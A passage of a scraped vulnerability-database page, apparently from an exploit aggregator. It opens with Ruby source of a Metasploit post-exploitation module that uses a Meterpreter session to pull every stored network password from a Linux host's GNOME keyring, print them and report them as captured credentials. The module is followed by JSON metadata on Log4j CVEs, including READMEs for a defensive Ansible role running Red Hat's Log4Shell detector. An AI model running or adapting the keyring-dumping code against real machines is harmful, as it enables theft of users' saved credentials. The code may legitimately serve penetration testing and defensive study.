Rex::Post::Meterpreter::RequestError\n    end\n    @hostname_cache[name] = address\n  end\n\n  def resolve_port(service)\n    port = {\n      &#x27;ftp&#x27;   =&gt; 21,\n      &#x27;http&#x27;  =&gt; 80,\n      &#x27;https&#x27; =&gt; 443,\n      &#x27;sftp&#x27;  =&gt; 22,\n      &#x27;ssh&#x27;   =&gt; 22,\n      &#x27;smb&#x27;   =&gt; 445\n    }[service]\n    port.nil? ? 0 : port\n  end\n\n  def run\n    init_railgun_defs\n    @hostname_cache = {}\n    libgnome_keyring = session.railgun.libgnome_keyring\n\n    unless libgnome_keyring.gnome_keyring_is_available()[&#x27;return&#x27;]\n      fail_with(Failure::NoTarget, &#x27;libgnome-keyring is unavailable&#x27;)\n    end\n\n    result = libgnome_keyring.gnome_keyring_find_network_password_sync(\n      nil,  # user\n      nil,  # domain\n      nil,  # server\n      nil,  # object\n      nil,  # protocol\n      nil,  # authtype\n      0,    # port\n      session.native_arch == ARCH_X64 ? 8 : 4\n    )\n\n    list_anchor = result[&#x27;results&#x27;].unpack(session.native_arch == ARCH_X64 ? &#x27;Q&#x27; : &#x27;L&#x27;)[0]\n    fail_with(Failure::NoTarget, &#x27;Did not receive a list of passwords&#x27;) if list_anchor == 0\n\n    entry = {:next_ptr =&gt; list_anchor}\n    begin\n      entry = get_list_entry(entry[:next_ptr])\n      pw_data = entry[:data]\n      # resolve necessary string fields to non-empty strings or nil\n      [:server, :user, :domain, :password, :protocol].each do |field|\n        value = pw_data[field]\n        pw_data[field] = nil\n        next if value == 0\n        value = get_string(value)\n        next if value.empty?\n        pw_data[field] = value\n      end\n\n      # skip the entry if we don&#x27;t at least have a username and password\n      next if pw_data[:user].nil? or pw_data[:password].nil?\n\n      printable = &#x27;&#x27;\n      printable &lt;&lt; \&quot;#{pw_data[:protocol]}://\&quot; unless pw_data[:protocol].nil?\n      printable &lt;&lt; \&quot;#{pw_data[:domain]}\\\\\&quot; unless pw_data[:domain].nil?\n      printable &lt;&lt; \&quot;#{pw_data[:user]}:#{pw_data[:password]}\&quot;\n      unless pw_data[:server].nil?\n        printable &lt;&lt; \&quot;@#{pw_data[:server]}\&quot;\n        printable &lt;&lt; \&quot;:#{pw_data[:port]}\&quot;\n      end\n      print_good(printable)\n\n      pw_data[:port] = resolve_port(pw_data[:protocol]) if pw_data[:port] == 0 and !pw_data[:protocol].nil?\n      next if pw_data[:port] == 0  # can&#x27;t report without a valid port\n      ip_address = resolve_host(pw_data[:server])\n      next if ip_address.nil?      # can&#x27;t report without an ip address\n\n      report_cred(\n        ip: ip_address,\n        port: pw_data[:port],\n        protocol: &#x27;tcp&#x27;,\n        service_name: pw_data[:protocol],\n        username: pw_data[:user],\n        password: pw_data[:password]\n      )\n\n    end while entry[:next_ptr] != list_anchor and entry[:next_ptr] != 0\n\n    libgnome_keyring.gnome_keyring_network_password_list_free(list_anchor)\n  end\nend\n&quot;, &quot;metasploitReliability&quot;: &quot;&quot;, &quot;metasploitHistory&quot;: &quot;&quot;, &quot;immutableFields&quot;: [], &quot;cvss2&quot;: {}, &quot;cvss3&quot;: {}}
    </div>
    <div style="display:none" id="references">
    {&quot;githubexploit&quot;: [{&quot;id&quot;: &quot;88F20430-F65B-520C-880E-FB9413D8C14F&quot;, &quot;vendorId&quot;: null, &quot;hash&quot;: &quot;7f0ef22c50c49fd3a862b3a9680ce2f6&quot;, &quot;type&quot;: &quot;githubexploit&quot;, &quot;bulletinFamily&quot;: &quot;exploit&quot;, &quot;title&quot;: &quot;Exploit for Improper Input Validation in Apache Log4J&quot;, &quot;description&quot;: &quot;sakuraji_log4j\n\nThis tool is used to dis...&quot;, &quot;published&quot;: &quot;2021-12-23T21:45:42&quot;, &quot;modified&quot;: &quot;2021-12-23T22:38:07&quot;, &quot;cvss&quot;: {&quot;score&quot;: 5.0, &quot;vector&quot;: &quot;AV:N/AC:L/Au:N/C:N/I:N/A:P&quot;}, &quot;cvss2&quot;: {&quot;cvssV2&quot;: {&quot;version&quot;: &quot;2.0&quot;, &quot;vectorString&quot;: &quot;AV:N/AC:L/Au:N/C:N/I:N/A:P&quot;, &quot;accessVector&quot;: &quot;NETWORK&quot;, &quot;accessComplexity&quot;: &quot;LOW&quot;, &quot;authentication&quot;: &quot;NONE&quot;, &quot;confidentialityImpact&quot;: &quot;NONE&quot;, &quot;integrityImpact&quot;: &quot;NONE&quot;, &quot;availabilityImpact&quot;: &quot;PARTIAL&quot;, &quot;baseScore&quot;: 5.0}, &quot;severity&quot;: &quot;MEDIUM&quot;, &quot;exploitabilityScore&quot;: 10.0, &quot;impactScore&quot;: 2.9, &quot;acInsufInfo&quot;: false, &quot;obtainAllPrivilege&quot;: false, &quot;obtainUserPrivilege&quot;: false, &quot;obtainOtherPrivilege&quot;: false, &quot;userInteractionRequired&quot;: false}, &quot;cvss3&quot;: {&quot;cvssV3&quot;: {&quot;version&quot;: &quot;3.1&quot;, &quot;vectorString&quot;: &quot;CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H&quot;, &quot;attackVector&quot;: &quot;NETWORK&quot;, &quot;attackComplexity&quot;: &quot;LOW&quot;, &quot;privilegesRequired&quot;: &quot;NONE&quot;, &quot;userInteraction&quot;: &quot;NONE&quot;, &quot;scope&quot;: &quot;UNCHANGED&quot;, &quot;confidentialityImpact&quot;: &quot;NONE&quot;, &quot;integrityImpact&quot;: &quot;NONE&quot;, &quot;availabilityImpact&quot;: &quot;HIGH&quot;, &quot;baseScore&quot;: 7.5, &quot;baseSeverity&quot;: &quot;HIGH&quot;}, &quot;exploitabilityScore&quot;: 3.9, &quot;impactScore&quot;: 3.6}, &quot;href&quot;: &quot;&quot;, &quot;reporter&quot;: &quot;&quot;, &quot;references&quot;: [], &quot;cvelist&quot;: [&quot;CVE-2021-45105&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-23T23:07:08&quot;, &quot;history&quot;: [], &quot;viewCount&quot;: 6, &quot;enchantments&quot;: {}, &quot;objectVersion&quot;: &quot;1.6&quot;, &quot;_object_type&quot;: &quot;robots.models.githubexploit.GithubExploitBulletin&quot;, &quot;_object_types&quot;: [&quot;robots.models.base.Bulletin&quot;, &quot;robots.models.githubexploit.GithubExploitBulletin&quot;], &quot;privateArea&quot;: 1}, {&quot;id&quot;: &quot;CF96C0AC-16EB-57DE-B450-775CC256F1C2&quot;, &quot;vendorId&quot;: null, &quot;hash&quot;: &quot;bb035feab0366b5e2ba61d0ca109b7ee&quot;, &quot;type&quot;: &quot;githubexploit&quot;, &quot;bulletinFamily&quot;: &quot;exploit&quot;, &quot;title&quot;: &quot;Exploit for Deserialization of Untrusted Data in Apache Log4J&quot;, &quot;description&quot;: &quot;lucab85.ansible_role_log4shell\n=========\n\n[![CI](https://github....&quot;, &quot;published&quot;: &quot;2021-12-23T13:24:41&quot;, &quot;modified&quot;: &quot;2021-12-23T22:32:27&quot;, &quot;cvss&quot;: {&quot;score&quot;: 9.3, &quot;vector&quot;: &quot;AV:N/AC:M/Au:N/C:C/I:C/A:C&quot;}, &quot;cvss2&quot;: {&quot;cvssV2&quot;: {&quot;version&quot;: &quot;2.0&quot;, &quot;vectorString&quot;: &quot;AV:N/AC:M/Au:N/C:C/I:C/A:C&quot;, &quot;accessVector&quot;: &quot;NETWORK&quot;, &quot;accessComplexity&quot;: &quot;MEDIUM&quot;, &quot;authentication&quot;: &quot;NONE&quot;, &quot;confidentialityImpact&quot;: &quot;COMPLETE&quot;, &quot;integrityImpact&quot;: &quot;COMPLETE&quot;, &quot;availabilityImpact&quot;: &quot;COMPLETE&quot;, &quot;baseScore&quot;: 9.3}, &quot;severity&quot;: &quot;HIGH&quot;, &quot;exploitabilityScore&quot;: 8.6, &quot;impactScore&quot;: 10.0, &quot;acInsufInfo&quot;: false, &quot;obtainAllPrivilege&quot;: false, &quot;obtainUserPrivilege&quot;: false, &quot;obtainOtherPrivilege&quot;: false, &quot;userInteractionRequired&quot;: false}, &quot;cvss3&quot;: {&quot;cvssV3&quot;: {&quot;version&quot;: &quot;3.1&quot;, &quot;vectorString&quot;: &quot;CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H&quot;, &quot;attackVector&quot;: &quot;NETWORK&quot;, &quot;attackComplexity&quot;: &quot;LOW&quot;, &quot;privilegesRequired&quot;: &quot;NONE&quot;, &quot;userInteraction&quot;: &quot;NONE&quot;, &quot;scope&quot;: &quot;CHANGED&quot;, &quot;confidentialityImpact&quot;: &quot;HIGH&quot;, &quot;integrityImpact&quot;: &quot;HIGH&quot;, &quot;availabilityImpact&quot;: &quot;HIGH&quot;, &quot;baseScore&quot;: 10.0, &quot;baseSeverity&quot;: &quot;CRITICAL&quot;}, &quot;exploitabilityScore&quot;: 3.9, &quot;impactScore&quot;: 6.0}, &quot;href&quot;: &quot;&quot;, &quot;reporter&quot;: &quot;&quot;, &quot;references&quot;: [], &quot;cvelist&quot;: [&quot;CVE-2021-44228&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-23T23:08:18&quot;, &quot;history&quot;: [{&quot;bulletin&quot;: {&quot;id&quot;: &quot;CF96C0AC-16EB-57DE-B450-775CC256F1C2&quot;, &quot;vendorId&quot;: &quot;GITHUBEXPL:LUCAB85-ANSIBLE-ROLE-LOG4SHELL&quot;, &quot;hash&quot;: &quot;e2253ab76e3e5c96bea6595845581558&quot;, &quot;type&quot;: &quot;githubexploit&quot;, &quot;bulletinFamily&quot;: &quot;exploit&quot;, &quot;title&quot;: &quot;Exploit for Deserialization of Untrusted Data in Apache Log4J&quot;, &quot;description&quot;: &quot;ansible-role-log4shell\n=========\n\nAnsible playbook to verify target Linux hosts using the official Red Hat Log4j detector script RHSB-2021-009 for Log4Shell (CVE-2021-44228).\n\n[Red Hat version 1.2 detector 2021-12-20](https://access.redhat.com/security/vulnerabilities/RHSB-2021-009).\n\nRequirements\n------------\n\nansible 2.9+\n\nRole Variables\n--------------\n\ndefault values:\n\n```yaml\nsh_detector: \&quot;cve-2021-44228--2021-12-20-1836.sh\&quot;\nsh_signature: &#x27;cve-2021-44228--2021-12-20-1836.sh.asc&#x27;\ndetector_baseurl: &#x27;https://access.redhat.com/sites/default/files/&#x27;\ndetector_path: \&quot;/var/\&quot;\ndetector_dir: \&quot;/tmp/cve-2021-44228/\&quot;\ndetector_run_dir: &#x27;tmp&#x27;\ndetector_options: &#x27;-n -d --no-progress --scan {{ detector_path }}&#x27;\ngpg_keyid: &#x27;7514F77D8366B0D9&#x27;\ngpg_public_key: &#x27;gpg --keyserver pgp.mit.edu --recv {{ gpg_keyid }}&#x27;\nclean_run_before: true\ndelete_after: false\nverify_gpg: true\n```\n\nDependencies\n------------\n\nNone.\n\nExample Playbook\n----------------\n\nIncluding an example of how to use your role (for instance, with variables passed in as parameters) is always nice for users too:\n\n    - hosts: servers\n      roles:\n         - { role: lucab85.ansible-role-log4shell }\n\nLicense\n-------\n\nMIT / BSD\n\n## Author Information\n\nThis role was created in 2021 by [Luca Berton](https://www.lucaberton.it/), author of [Ansible Pilot](https://www.ansiblepilot.com/).\n\n## Ansible Pilot\n\nMore information:\n\n- [Website](https://www.ansiblepilot.com/)\n- [Ansible Pilot YouTube channel](https://www.youtube.com/channel/UC5MNbTYRHSCu9vAki3z9SmA)\n- [Medium](https://ansiblepilot.medium.com/)\n- [Twitter](https://twitter.com/ansiblepilot)\n\n## Donate\n\nThank you for supporting me:\n\n- [Patreon](https://patreon.com/lucaberton)\n- [Buy me a pizza](https://www.buymeacoffee.com/lucab)\n- [GitHub sponsor](https://github.com/sponsors/lucab85)\n&quot;, &quot;published&quot;: &quot;2021-12-23T13:24:41&quot;, &quot;modified&quot;: &quot;2021-12-23T13:30:58&quot;, &quot;cvss&quot;: {&quot;score&quot;: 9.3, &quot;vector&quot;: &quot;AV:N/AC:M/Au:N/C:C/I:C/A:C&quot;}, &quot;cvss2&quot;: {&quot;cvssV2&quot;: {&quot;version&quot;: &quot;2.0&quot;, &quot;vectorString&quot;: &quot;AV:N/AC:M/Au:N/C:C/I:C/A:C&quot;, &quot;accessVector&quot;: &quot;NETWORK&quot;, &quot;accessComplexity&quot;: &quot;MEDIUM&quot;, &quot;authentication&quot;: &quot;NONE&quot;, &quot;confidentialityImpact&quot;: &quot;COMPLETE&quot;, &quot;integrityImpact&quot;: &quot;COMPLETE&quot;, &quot;availabilityImpact&quot;: &quot;COMPLETE&quot;, &quot;baseScore&quot;: 9.3}, &quot;severity&quot;: &quot;HIGH&quot;, &quot;exploitabilityScore&quot;: 8.6, &quot;impactScore&quot;: 10.0, &quot;acInsufInfo&quot;: false, &quot;obtainAllPrivilege&quot;: false, &quot;obtainUserPrivilege&quot;: false, &quot;obtainOtherPrivilege&quot;: false, &quot;userInteractionRequired&quot;: false}, &quot;cvss3&quot;: {&quot;cvssV3&quot;: {&quot;version&quot;: &quot;3.1&quot;, &quot;vectorString&quot;: &quot;CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H&quot;, &quot;attackVector&quot;: &quot;NETWORK&quot;, &quot;attackComplexity&quot;: &quot;LOW&quot;, &quot;privilegesRequired&quot;: &quot;NONE&quot;, &quot;userInteraction&quot;: &quot;NONE&quot;, &quot;scope&quot;: &quot;CHANGED&quot;, &quot;confidentialityImpact&quot;: &quot;HIGH&quot;, &quot;integrityImpact&quot;: &quot;HIGH&quot;, &quot;availabilityImpact&quot;: &quot;HIGH&quot;, &quot;baseScore&quot;: 10.0, &quot;baseSeverity&quot;: &quot;CRITICAL&quot;}, &quot;exploitabilityScore&quot;: 3.9, &quot;impactScore&quot;: 6.0}, &quot;href&quot;: &quot;https://github.com/lucab85/ansible-role-log4shell&quot;, &quot;reporter&quot;: &quot;lucab85&quot;, &quot;references&quot;: [], &quot;cvelist&quot;: [&quot;CVE-2021-44228&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-23T14:07:55&quot;, &quot;history&quot;: [], &quot;viewCount&quot;: 7, &quot;enchantments&quot;: {}, &quot;objectVersion&quot;: &quot;1.6&quot;}, &quot;lastseen&quot;: &quot;2021-12-23T14:07:55&quot;, &quot;differentElements&quot;: [&quot;modified&quot;], &quot;edition&quot;: 1}, {&quot;bulletin&quot;: {&quot;id&quot;: &quot;CF96C0AC-16EB-57DE-B450-775CC256F1C2&quot;, &quot;vendorId&quot;: &quot;GITHUBEXPL:LUCAB85-ANSIBLE-ROLE-LOG4SHELL&quot;, &quot;hash&quot;: &quot;2f5b99c5eb91a8c03bf3ed04fe90c740&quot;, &quot;type&quot;: &quot;githubexploit&quot;, &quot;bulletinFamily&quot;: &quot;exploit&quot;, &quot;title&quot;: &quot;Exploit for Deserialization of Untrusted Data in Apache Log4J&quot;, &quot;description&quot;: &quot;ansible-role-log4shell\n=========\n\nAnsible playbook to verify target Linux hosts using the official Red Hat Log4j detector script RHSB-2021-009 for Log4Shell (CVE-2021-44228).\n\n[Red Hat version 1.2 detector 2021-12-20](https://access.redhat.com/security/vulnerabilities/RHSB-2021-009).\n\nRequirements\n------------\n\nansible 2.9+\n\nRole Variables\n--------------\n\ndefault values:\n\n```yaml\nsh_detector: \&quot;cve-2021-44228--2021-12-20-1836.sh\&quot;\nsh_signature: &#x27;cve-2021-44228--2021-12-20-1836.sh.asc&#x27;\ndetector_baseurl: &#x27;https://access.redhat.com/sites/default/files/&#x27;\ndetector_path: \&quot;/var/\&quot;\ndetector_dir: \&quot;/tmp/cve-2021-44228/\&quot;\ndetector_run_dir: &#x27;tmp&#x27;\ndetector_options: &#x27;-n -d --no-progress --scan {{ detector_path }}&#x27;\ngpg_keyid: &#x27;7514F77D8366B0D9&#x27;\ngpg_public_key: &#x27;gpg --keyserver pgp.mit.edu --recv {{ gpg_keyid }}&#x27;\nclean_run_before: true\ndelete_after: false\nverify_gpg: true\n```\n\nDependencies\n------------\n\nNone.\n\nExample Playbook\n----------------\n\nIncluding an example of how to use your role (for instance, with variables passed in as parameters) is always nice for users too:\n\n    - hosts: servers\n      roles:\n         - { role: lucab85.ansible-role-log4shell }\n\nLicense\n-------\n\nMIT / BSD\n\n## Author Information\n\nThis role was created in 2021 by [Luca Berton](https://www.lucaberton.it/), author of [Ansible Pilot](https://www.ansiblepilot.com/).\n\n## Ansible Pilot\n\nMore information:\n\n- [Website](https://www.ansiblepilot.com/)\n- [Ansible Pilot YouTube channel](https://www.youtube.com/channel/UC5MNbTYRHSCu9vAki3z9SmA)\n- [Medium](https://ansiblepilot.medium.com/)\n- [Twitter](https://twitter.com/ansiblepilot)\n\n## Donate\n\nThank you for supporting me:\n\n- [Patreon](https://patreon.com/lucaberton)\n- [Buy me a pizza](https://www.buymeacoffee.com/lucab)\n- [GitHub sponsor](https://github.com/sponsors/lucab85)\n&quot;, &quot;published&quot;: &quot;2021-12-23T13:24:41&quot;, &quot;modified&quot;: &quot;2021-12-23T17:07:23&quot;, &quot;cvss&quot;: {&quot;score&quot;: 9.3, &quot;vector&quot;: &quot;AV:N/AC:M/Au:N/C:C/I:C/A:C&quot;}, &quot;cvss2&quot;: {&quot;cvssV2&quot;: {&quot;version&quot;: &quot;2.0&quot;, &quot;vectorString&quot;: &quot;AV:N/AC:M/Au:N/C:C/I:C/A:C&quot;, &quot;accessVector&quot;: &quot;NETWORK&quot;, &quot;accessComplexity&quot;: &quot;MEDIUM&quot;, &quot;authentication&quot;: &quot;NONE&quot;, &quot;confidentialityImpact&quot;: &quot;COMPLETE&quot;, &quot;integrityImpact&quot;: &quot;COMPLETE&quot;, &quot;availabilityImpact&quot;: &quot;COMPLETE&quot;, &quot;baseScore&quot;: 9.3}, &quot;severity&quot;: &quot;HIGH&quot;, &quot;exploitabilityScore&quot;: 8.6, &quot;impactScore&quot;: 10.0, &quot;acInsufInfo&quot;: false, &quot;obtainAllPrivilege&quot;: false, &quot;obtainUserPrivilege&quot;: false, &quot;obtainOtherPrivilege&quot;: false, &quot;userInteractionRequired&quot;: false}, &quot;cvss3&quot;: {&quot;cvssV3&quot;: {&quot;version&quot;: &quot;3.1&quot;, &quot;vectorString&quot;: &quot;CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H&quot;, &quot;attackVector&quot;: &quot;NETWORK&quot;, &quot;attackComplexity&quot;: &quot;LOW&quot;, &quot;privilegesRequired&quot;: &quot;NONE&quot;, &quot;userInteraction&quot;: &quot;NONE&quot;, &quot;scope&quot;: &quot;CHANGED&quot;, &quot;confidentialityImpact&quot;: &quot;HIGH&quot;, &quot;integrityImpact&quot;: &quot;HIGH&quot;, &quot;availabilityImpact&quot;: &quot;HIGH&quot;, &quot;baseScore&quot;: 10.0, &quot;baseSeverity&quot;: &quot;CRITICAL&quot;}, &quot;exploitabilityScore&quot;: 3.9, &quot;impactScore&quot;: 6.0}, &quot;href&quot;: &quot;https://github.com/lucab85/ansible-role-log4shell&quot;, &quot;reporter&quot;: &quot;lucab85&quot;, &quot;references&quot;: [], &quot;cvelist&quot;: [&quot;CVE-2021-44228&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-23T17:07:44&quot;, &quot;history&quot;: [], &quot;viewCount&quot;: 12, &quot;enchantments&quot;: {}, &quot;objectVersion&quot;: &quot;1.6&quot;}, &quot;lastseen&quot;: &quot;2021-12-23T17:07:44&quot;, &quot;differentElements&quot;: [&quot;description&quot;, &quot;modified&quot;], &quot;edition&quot;: 2}, {&quot;bulletin&quot;: {&quot;id&quot;: &quot;CF96C0AC-16EB-57DE-B450-775CC256F1C2&quot;, &quot;vendorId&quot;: &quot;GITHUBEXPL:LUCAB85-ANSIBLE-ROLE-LOG4SHELL&quot;, &quot;hash&quot;: &quot;f37860e77e075b9d031501f886dfd7a3&quot;, &quot;type&quot;: &quot;githubexploit&quot;, &quot;bulletinFamily&quot;: &quot;exploit&quot;, &quot;title&quot;: &quot;Exploit for Deserialization of Untrusted Data in Apache Log4J&quot;, &quot;description&quot;: &quot;lucab85.ansible_role_log4shell\n=========\n\n[![CI](https://github.com/lucab85/ansible-role-log4shell/actions/workflows/ci.yml/badge.svg)](https://github.com/lucab85/ansible-role-log4shell/actions/workflows/ci.yml)\n[![Release](https://github.com/lucab85/ansible-role-log4shell/actions/workflows/release.yml/badge.svg)](https://github.com/lucab85/ansible-role-log4shell/actions/workflows/release.yml)\n\nAnsible playbook to verify target Linux hosts using the official Red Hat Log4j detector script RHSB-2021-009 for Log4Shell (CVE-2021-44228).\n\n[Red Hat version 1.2 detector 2021-12-20](https://access.redhat.com/security/vulnerabilities/RHSB-2021-009).\n\nRequirements\n------------\n\nansible 2.9+\n\nRole Variables\n--------------\n\ndefault values:\n\n```yaml\nsh_detector: \&quot;cve-2021-44228--2021-12-20-1836.sh\&quot;\nsh_signature: &#x27;cve-2021-44228--2021-12-20-1836.sh.asc&#x27;\ndetector_baseurl: &#x27;https://access.redhat.com/sites/default/files/&#x27;\ndetector_path: \&quot;/var/\&quot;\ndetector_dir: \&quot;/tmp/cve-2021-44228/\&quot;\ndetector_run_dir: &#x27;tmp&#x27;\ndetector_options: &#x27;-n -d --no-progress --scan {{ detector_path }}&#x27;\ngpg_keyid: &#x27;7514F77D8366B0D9&#x27;\ngpg_public_key: &#x27;gpg --keyserver pgp.mit.edu --recv {{ gpg_keyid }}&#x27;\nclean_run_before: true\ndelete_after: false\nverify_gpg: true\n```\n\nDependencies\n------------\n\nNone.\n\nDownload\n------------\n\n```bash\nansible-galaxy install lucab85.ansible_role_log4shell\n\n```\n\nExample Playbook\n----------------\n\nIncluding an example of how to use your role (for instance, with variables passed in as parameters) is always nice for users too:\n\n    - hosts: servers\n      roles:\n         - { role: lucab85.ansible_role_log4shell }\n\nLicense\n-------\n\nMIT / BSD\n\n## Author Information\n\nThis role was created in 2021 by [Luca Berton](https://www.lucaberton.it/), author of [Ansible Pilot](https://www.ansiblepilot.com/).\n\n## Ansible Pilot\n\nMore information:\n\n- [Website](https://www.ansiblepilot.com/)\n- [Ansible Pilot YouTube channel](https://www.youtube.com/channel/UC5MNbTYRHSCu9vAki3z9SmA)\n- [Medium](https://ansiblepilot.medium.com/)\n- [Twitter](https://twitter.com/ansiblepilot)\n\n## Donate\n\nThank you for supporting me:\n\n- [Patreon](https://patreon.com/lucaberton)\n- [Buy me a pizza](https://www.buymeacoffee.com/lucab)\n- [GitHub sponsor](https://github.com/sponsors/lucab85)\n&quot;, &quot;published&quot;: &quot;2021-12-23T13:24:41&quot;, &quot;modified&quot;: &quot;2021-12-23T20:04:38&quot;, &quot;cvss&quot;: {&quot;score&quot;: 9.3, &quot;vector&quot;: &quot;AV:N/AC:M/Au:N/C:C/I:C/A:C&quot;}, &quot;cvss2&quot;: {&quot;cvssV2&quot;: {&quot;version&quot;: &quot;2.0&quot;, &quot;vectorString&quot;: &quot;AV:N/AC:M/Au:N/C:C/I:C/A:C&quot;, &quot;accessVector&quot;: &quot;NETWORK&quot;, &quot;accessComplexity&quot;: &quot;MEDIUM&quot;, &quot;authentication&quot;: &quot;NONE&quot;, &quot;confidentialityImpact&quot;: &quot;COMPLETE&quot;, &quot;integrityImpact&quot;: &quot;COMPLETE&quot;, &quot;availabilityImpact&quot;: &quot;COMPLETE&quot;, &quot;baseScore&quot;: 9.3}, &quot;severity&quot;: &quot;HIGH&quot;, &quot;exploitabilityScore&quot;: 8.6, &quot;impactScore&quot;: 10.0, &quot;acInsufInfo&quot;: false, &quot;obtainAllPrivilege&quot;: false, &quot;obtainUserPrivilege&quot;: false, &quot;obtainOtherPrivilege&quot;: false, &quot;userInteractionRequired&quot;: false}, &quot;cvss3&quot;: {&quot;cvssV3&quot;: {&quot;version&quot;: &quot;3.1&quot;, &quot;vectorString&quot;: &quot;CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H&quot;, &quot;attackVector&quot;: &quot;NETWORK&quot;, &quot;attackComplexity&quot;: &quot;LOW&quot;, &quot;privilegesRequired&quot;: &quot;NONE&quot;, &quot;userInteraction&quot;: &quot;NONE&quot;, &quot;scope&quot;: &quot;CHANGED&quot;, &quot;confidentialityImpact&quot;: &quot;HIGH&quot;, &quot;integrityImpact&quot;: &quot;HIGH&quot;, &quot;availabilityImpact&quot;: &quot;HIGH&quot;, &quot;baseScore&quot;: 10.0, &quot;baseSeverity&quot;: &quot;CRITICAL&quot;}, &quot;exploitabilityScore&quot;: 3.9, &quot;impactScore&quot;: 6.0}, &quot;href&quot;: &quot;https://github.com/lucab85/ansible-role-log4shell&quot;, &quot;reporter&quot;: &quot;lucab85&quot;, &quot;references&quot;: [], &quot;cvelist&quot;: [&quot;CVE-2021-44228&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-23T20:08:15&quot;, &quot;history&quot;: [], &quot;viewCount&quot;: 16, &quot;enchantments&quot;: {&quot;dependencies&quot;: {&quot;references&quot;: [{&quot;type&quot;: &quot;ubuntucve&quot;, &quot;idList&quot;: [&quot;UB:CVE-2021-44228&quot;]}, {&quot;type&quot;: &quot;debiancve&quot;, &quot;idList&quot;: [&quot;DEBIANCVE:CVE-2021-44228&quot;]}, {&quot;type&quot;: &quot;cve&quot;, &quot;idList&quot;: [&quot;CVE-2021-44228&quot;]}, {&quot;type&quot;: &quot;rst&quot;, &quot;idList&quot;: [&quot;RST:D86EFFA9-3107-38D5-A9C0-D3CBF091E39D&quot;, &quot;RST:4B2296DE-AF2D-3763-8B79-92DE43775C59&quot;, &quot;RST:88DC31E6-A134-3949-9AF5-51E25878A894&quot;, &quot;RST:06FFD918-46C2-3F1B-A100-A53CD8C0E7CD&quot;, &quot;RST:C857CD75-26C6-3F83-8C9E-226118527715&quot;, &quot;RST:9A0665BB-4202-38BD-A548-1C0EEC9498C9&quot;]}, {&quot;type&quot;: &quot;attackerkb&quot;, &quot;idList&quot;: [&quot;AKB:0B6C144F-2E5A-4D5E-B629-E45C2530CB94&quot;]}, {&quot;type&quot;: &quot;githubexploit&quot;, &quot;idList&quot;: [&quot;EA1AF0D9-1E6E-5080-BB7C-9D6035795FFB&quot;, &quot;8F15A064-7841-5899-84CE-8C298A269F83&quot;, &quot;7B2DA44B-D36F-56A4-B4D8-376B8D2F5586&quot;, &quot;8B324F0D-EA80-53B5-8ECF-EB5FC5C0EA13&quot;, &quot;5A5A28A1-2601-54F3-BA06-BCFF1A9DCCA5&quot;, &quot;1B11A8A4-B07C-580C-AF38-33A50B17B19A&quot;, &quot;8F362564-1631-5AF9-BB38-D1BFC4678DAE&quot;, &quot;EC35769F-2EAD-5464-8F97-D90F768E1E2D&quot;, &quot;3EA1CA63-F1F5-5A86-AB97-E327DAE18E93&quot;, &quot;865C5B8F-B074-5B0D-834A-E714EB00ADFC&quot;, &quot;9F3ABA17-E33A-5018-9DCB-AECDD8DE9DEE&quot;, &quot;FE8572DF-42D4-521C-B3DC-4715C2F9240D&quot;, &quot;8D0CF3A6-EC3F-536C-A424-08879FF2F158&quot;, &quot;22AAF71B-053F-5E71-9F26-039C48FCCD62&quot;, &quot;817FB04E-AFFE-567B-8A2C-64C0A8923734&quot;, &quot;E59C9A70-6F3E-5CF6-9F15-B0039E0FBAF1&quot;, &quot;066BA250-177D-5017-9AC2-6B948A465ABC&quot;, &quot;D6EE5F29-18C9-5E59-B9E2-01DC93F5ACE9&quot;, &quot;780AD920-FF08-55C6-84C8-A8536C6F5527&quot;, &quot;7BCC0C24-A1F7-531E-B1BA-342D21C9AF02&quot;, &quot;D813949A-183D-55ED-AF64-B130B8F95A56&quot;, &quot;0BC62E37-D6E2-5B2C-BF89-3E00D98D2E30&quot;, &quot;21B5671D-2A35-52FF-9702-380A32B96260&quot;, &quot;CA625124-9F92-5FCF-83A7-3ECF5F0EBBFB&quot;, &quot;22C736D4-4179-585F-990B-A40436F65461&quot;, &quot;ACB6C453-F1D5-5A65-91C2-DF455B997075&quot;]}, {&quot;type&quot;: &quot;wallarmlab&quot;, &quot;idList&quot;: [&quot;WALLARMLAB:060FBB90648BCDE11554492408AE89C8&quot;, &quot;WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884&quot;, &quot;WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB&quot;]}, {&quot;type&quot;: &quot;redhatcve&quot;, &quot;idList&quot;: [&quot;RH:CVE-2021-44228&quot;]}, {&quot;type&quot;: &quot;impervablog&quot;, &quot;idList&quot;: [&quot;IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71&quot;, &quot;IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2&quot;, &quot;IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E&quot;]}, {&quot;type&quot;: &quot;msrc&quot;, &quot;idList&quot;: [&quot;MSRC:543F3A129A47F4B14FB170389908717B&quot;]}, {&quot;type&quot;: &quot;rapid7blog&quot;, &quot;idList&quot;: [&quot;RAPID7BLOG:9CB105938BDE92F573A2DE68BC20CF46&quot;, &quot;RAPID7BLOG:F37BD0C67170721734A26D15E6D99B3E&quot;]}, {&quot;type&quot;: &quot;ibm&quot;, &quot;idList&quot;: [&quot;CE6A6F0970C169F7DBE65AA5DFCFCEC0BEA99E837906D043FD4B6D3BF7A87D67&quot;, &quot;D928C805B6C7AD1BA5D5DA1EB77352559E54787E379CD22474A13592C0B83C20&quot;, &quot;23532FC7488A1E0A5525D86FA8B58841ED6086B69C02A7FBB104B3F98E2ED3CE&quot;, &quot;18A5E6C2581806177DE446AE26FCBC2EBB616C29B40041253F318FF51CE1AFB5&quot;, &quot;6FCF3A6897C9A1A085633762339E7EC8DFE631B6D2A160FA5D1ADBC3E11F92E1&quot;, 